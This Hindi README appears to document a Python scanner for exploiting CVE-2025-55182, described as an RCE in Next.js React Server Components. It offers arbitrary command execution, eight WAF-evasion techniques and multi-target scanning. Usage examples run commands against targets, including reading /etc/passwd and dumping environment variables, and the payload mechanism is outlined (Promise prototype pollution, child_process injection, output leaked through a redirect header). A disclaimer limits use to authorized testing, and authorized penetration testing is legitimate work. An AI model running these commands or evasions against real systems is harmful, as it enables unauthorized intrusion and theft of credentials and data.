
Next.js में CVE-2025-55182 RCE के लिए स्वचालित स्कैनर, जिसमें 8 WAF बायपास तकनीकें, कस्टम कमांड निष्पादन, और अधिकृत पेनेट्रेशन परीक्षण के लिए केवल-परीक्षण डिटेक्शन मोड शामिल है।
Next.js अनुप्रयोगों में CVE-2025-55182 भेद्यता का पता लगाने और उसका शोषण करने के लिए उन्नत पेनेट्रेशन परीक्षण टूल
📋 विषय-सूची अवलोकन
विशेषताएँ
स्थापना
उपयोग
उदाहरण
बायपास तकनीकें
तकनीकी विवरण
अस्वीकरण
योगदान
लाइसेंस
🔍 अवलोकन CVE-2025-55182 एक गंभीर रिमोट कोड एक्सेक्यूशन (RCE) भेद्यता है जो React Server Components के माध्यम से Next.js अनुप्रयोगों को प्रभावित करती है। यह स्कैनर विभिन्न WAF बायपास तकनीकों के साथ इस भेद्यता का पता लगाने और उसका शोषण करने का एक स्वचालित तरीका प्रदान करता है।
CVSS स्कोर: 9.8 (गंभीर)
✨ विशेषताएँ एकाधिक पेलोड वेरिएंट: विभिन्न शोषण पैटर्न
WAF बायपास तकनीकें: 8 अलग-अलग बायपास विधियाँ
कस्टम कमांड निष्पादन: मनमाने सिस्टम कमांड निष्पादित करें
भेद्यता परीक्षण: सुरक्षित पहचान के लिए केवल-परीक्षण मोड
प्रॉक्सी समर्थन: डीबगिंग के लिए प्रॉक्सी के माध्यम से ट्रैफ़िक रूट करें
SSL बायपास: SSL प्रमाणपत्र सत्यापन छोड़ने का विकल्प
पुनः प्रयास तंत्र: विफलता पर स्वचालित पुनः प्रयास
रंगीन आउटपुट: आसानी से पढ़ने योग्य कंसोल इंटरफ़ेस
🚀 स्थापना पूर्वापेक्षाएँ Python 3.6 या उच्चतर
pip पैकेज मैनेजर
# Install dependencies
pip install -r requirements.txt
# Make the script executable (Linux/Mac)
chmod +x scanner.py
Docker स्थापना
# Build Docker image
docker build -t cve-2025-55182-scanner .
# Run with Docker
docker run --rm cve-2025-55182-scanner -h
📖 उपयोग मूल उपयोग
# Show help
python scanner.py -h
# Test a target
python scanner.py -d http://target.com --test-only
# Execute command
python scanner.py -d http://target.com -c "whoami"
कमांड-लाइन विकल्प
📚 उदाहरण मूल शोषण
# Test if target is vulnerable
python scanner.py -d http://vulnapp.com --test-only
# Execute simple command
python scanner.py -d http://target.com -c "id"
# List directory contents
python scanner.py -d https://target.com -c "ls -la" -k
# Read system file
python scanner.py -d http://localhost:3000 -c "cat /etc/passwd"
WAF बायपास उदाहरण
# Use Base64 encoding bypass
python scanner.py -d http://target.com -c "uname -a" -t 2
# Use Unicode encoding
python scanner.py -d https://target.com -c "whoami" -t 3 -k
# Use mixed techniques with proxy
python scanner.py -d http://target.com -c "pwd" -t 4 -p http://127.0.0.1:8080
# Try all techniques automatically
for i in {1..8}; do
echo "Trying technique $i"
python scanner.py -d http://target.com -c "hostname" -t $i
echo ""
done
उन्नत उपयोग
# Test multiple targets from file
for target in $(cat targets.txt); do
echo "Testing $target"
python scanner.py -d $target --test-only
done
# Save output to file
python scanner.py -d http://target.com -c "ifconfig" > output.txt
# Use with Burp Suite proxy
python scanner.py -d https://target.com -c "env" -p http://127.0.0.1:8080 -k
🛡️ बायपास तकनीकें स्कैनर में 8 अलग-अलग WAF बायपास तकनीकें शामिल हैं:
डिफ़ॉल्ट पेलोड: मूल शोषण पैटर्न
Base64 एन्कोडिंग: कमांड को Base64 में एन्कोड करें
यूनिकोड एन्कोडिंग: यूनिकोड कैरेक्टर एन्कोडिंग का उपयोग करें
केस हेरफेर: यादृच्छिक केस विविधताएँ
डबल एन्कोडिंग: डबल URL एन्कोडिंग
नल बाइट्स: नल बाइट इंजेक्शन
मिश्रित हेडर: विविध HTTP हेडर
यादृच्छिक विलंब: यादृच्छिक स्लीप अंतराल जोड़ें
प्रत्येक तकनीक को -t फ़्लैग के साथ चुना जा सकता है।
🔧 तकनीकी विवरण भेद्यता की पृष्ठभूमि CVE-2025-55182 Next.js में एक प्रोटोटाइप पोल्यूशन भेद्यता है जो React Server Components के माध्यम से रिमोट कोड एक्सेक्यूशन की ओर ले जाती है। यह भेद्यता हमलावरों को सर्वर पर मनमाने कमांड निष्पादित करने की अनुमति देती है।
पेलोड संरचना यह टूल RCE प्राप्त करने के लिए प्रोटोटाइप पोल्यूशन के साथ विशेष रूप से तैयार multipart/form-data अनुरोध का उपयोग करता है:
प्रोटोटाइप पोल्यूशन: Promise प्रोटोटाइप श्रृंखला को दूषित करता है
कमांड इंजेक्शन: Node.js child_process निष्पादन इंजेक्ट करता है
परिणाम निष्कर्षण: रीडायरेक्ट हेडर के माध्यम से परिणाम निकालता है
पहचान विधि स्कैनर विशेष रूप से तैयार अनुरोध भेजता है और निम्न की तलाश करता है:
कमांड आउटपुट वाले X-Action-Redirect हेडर
सफल शोषण का संकेत देने वाले विशिष्ट प्रतिक्रिया पैटर्न
त्रुटि संदेश जो भेद्यता की उपस्थिति का सुझाव देते हैं
⚠️ अस्वीकरण महत्वपूर्ण: केवल कानूनी और नैतिक उपयोग
यह टूल निम्न के लिए प्रदान किया गया है:
सुरक्षा अनुसंधान और शिक्षा
अधिकृत पेनेट्रेशन परीक्षण
उचित अनुमति के साथ भेद्यता मूल्यांकन
रक्षात्मक सुरक्षा उद्देश्य
इस टूल का उपयोग इनके लिए न करें:
सिस्टम का अनधिकृत परीक्षण
अवैध गतिविधियाँ
दुर्भावनापूर्ण उद्देश्य
सेवा की शर्तों का उल्लंघन
इस टूल का उपयोग करके, आप सहमत होते हैं:
इसका उपयोग केवल उन सिस्टम पर करें जिनके स्वामी आप हैं या जिनके परीक्षण की स्पष्ट अनुमति आपके पास है
सभी लागू कानूनों और विनियमों का पालन करें
अपने कार्यों की पूर्ण जिम्मेदारी स्वीकार करें
किसी भी दुरुपयोग के लिए लेखक को उत्तरदायी न ठहराएँ
🤝 योगदान योगदान का स्वागत है! आप इस प्रकार मदद कर सकते हैं:
समस्याओं की रिपोर्ट करना जाँचें कि क्या समस्या पहले से मौजूद है
विस्तृत पुनरुत्पादन चरण प्रदान करें
त्रुटि संदेश और लॉग शामिल करें
अपने वातावरण का विवरण निर्दिष्ट करें
कोड योगदान रिपॉजिटरी को फोर्क करें
एक फीचर ब्रांच बनाएँ
स्पष्ट कमिट संदेश लिखें
यदि लागू हो तो परीक्षण जोड़ें
पुल रिक्वेस्ट सबमिट करें
फीचर अनुरोध "enhancement" लेबल के साथ GitHub इश्यू के माध्यम से नई सुविधाओं का सुझाव दें।
📄 लाइसेंस यह प्रोजेक्ट MIT लाइसेंस के अंतर्गत लाइसेंस प्राप्त है - विवरण के लिए LICENSE फ़ाइल देखें।
MIT लाइसेंस
कॉपीराइट (c) 2025
इसके द्वारा, बिना किसी शुल्क के, इस सॉफ़्टवेयर और संबंधित दस्तावेज़ फ़ाइलों ("सॉफ़्टवेयर") की एक प्रति प्राप्त करने वाले किसी भी व्यक्ति को, बिना किसी प्रतिबंध के सॉफ़्टवेयर से निपटने की अनुमति दी जाती है, जिसमें बिना किसी सीमा के सॉफ़्टवेयर की प्रतियों का उपयोग, प्रतिलिपि बनाने, संशोधित करने, विलय करने, प्रकाशित करने, वितरित करने, उप-लाइसेंस देने और/या बेचने के अधिकार, और उन व्यक्तियों को अनुमति देना शामिल है जिन्हें सॉफ़्टवेयर प्रदान किया गया है, निम्नलिखित शर्तों के अधीन:
उपरोक्त कॉपीराइट नोटिस और यह अनुमति नोटिस सॉफ़्टवेयर की सभी प्रतियों या महत्वपूर्ण भागों में शामिल किए जाएँगे।
सॉफ़्टवेयर "जैसा है" प्रदान किया जाता है, बिना किसी प्रकार की वारंटी के, व्यक्त या निहित, जिसमें बिना सीमा के व्यापारिकता, किसी विशेष उद्देश्य के लिए उपयुक्तता और गैर-उल्लंघन की वारंटी शामिल है। किसी भी स्थिति में लेखक या कॉपीराइट धारक किसी भी दावे, क्षति या अन्य दायित्व के लिए उत्तरदायी नहीं होंगे, चाहे वह अनुबंध, टोर्ट या अन्यथा के कार्य में उत्पन्न हो, सॉफ़्टवेयर से या सॉफ़्टवेयर के उपयोग या अन्य लेन-देन से संबंधित हो।
🔗 संदर्भ CVE-2025-55182 आधिकारिक प्रविष्टि
ProjectDiscovery Nuclei टेम्पलेट
Next.js सुरक्षा सलाह
React Server Components दस्तावेज़ीकरण
⭐ स्टार इतिहास यदि आपको यह टूल उपयोगी लगता है, तो कृपया इसे GitHub पर एक स्टार देने पर विचार करें!
याद रखें: अधिक शक्ति के साथ अधिक जिम्मेदारी आती है। इस टूल का उपयोग नैतिक और कानूनी रूप से करें।
| विकल्प | विवरण | डिफ़ॉल्ट |
|---|
| -d, --domain | लक्ष्य URL | http://localhost:3000 |
| -c, --command | निष्पादित करने के लिए कमांड | id |
| -t, --technique | बायपास तकनीक (1-8) | 1 |
| -p, --proxy | प्रॉक्सी सर्वर | None |
| -k, --insecure | SSL सत्यापन छोड़ें | False |
| --test-only | केवल भेद्यता का परीक्षण करें | False |
| -h, --help | सहायता संदेश दिखाएँ | N/A |